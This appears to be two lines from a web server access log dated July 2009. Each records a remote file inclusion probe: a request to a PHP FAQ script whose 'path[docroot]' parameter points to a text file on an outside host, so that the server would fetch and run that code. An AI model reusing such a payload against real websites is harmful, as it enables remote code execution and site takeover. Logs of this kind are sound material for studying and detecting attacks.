211.230.156.161 - - [04/Jul/2009:17:45:09 -0700] "GET /logs/showfile.php//faqsupport/samplefaqsupport.php?path[docroot]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:17:45:09 -0700] "GET /logs/showfile.php/access_090510.log//faqsupport/samplefaqsupport.php?path[docroot]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
